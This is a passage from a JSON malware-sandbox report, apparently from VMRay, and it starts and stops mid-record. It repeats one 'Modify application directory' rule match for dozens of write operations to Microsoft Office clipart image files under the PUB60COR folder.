"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213243.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213243.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37496", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213243.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213449.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37503", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0213449.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214934.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37510", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214934.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214948.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37519", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214948.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215070.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37530", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215070.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215076.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37537", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215076.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215210.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37544", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215210.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215709.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215709.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37555", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215709.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215710.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215710.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215718.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215718.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37571", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215718.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216112.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37578", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216112.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216153.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37589", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216153.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216540.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37598", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216540.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216570.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37609", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216570.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216600.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37618", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216600.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216612.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37625", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216612.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216874.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37632", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216874.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217262.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217262.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217302.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217302.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37650", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217302.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217872.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217872.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37657", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0217872.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227419.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37664", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227419.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227558.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227558.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228823.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37688", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228823.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228959.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37697", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228959.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230553.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230553.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37708", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230553.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0230558.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230558.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37715", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0230558.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232171.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232171.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37722", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232171.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232393.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37729", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232393.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232395.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37738", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232395.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232795.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232795.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37749", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232795.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232797.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37756", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232797.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232803.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_37767", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232803.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233512.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233512.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 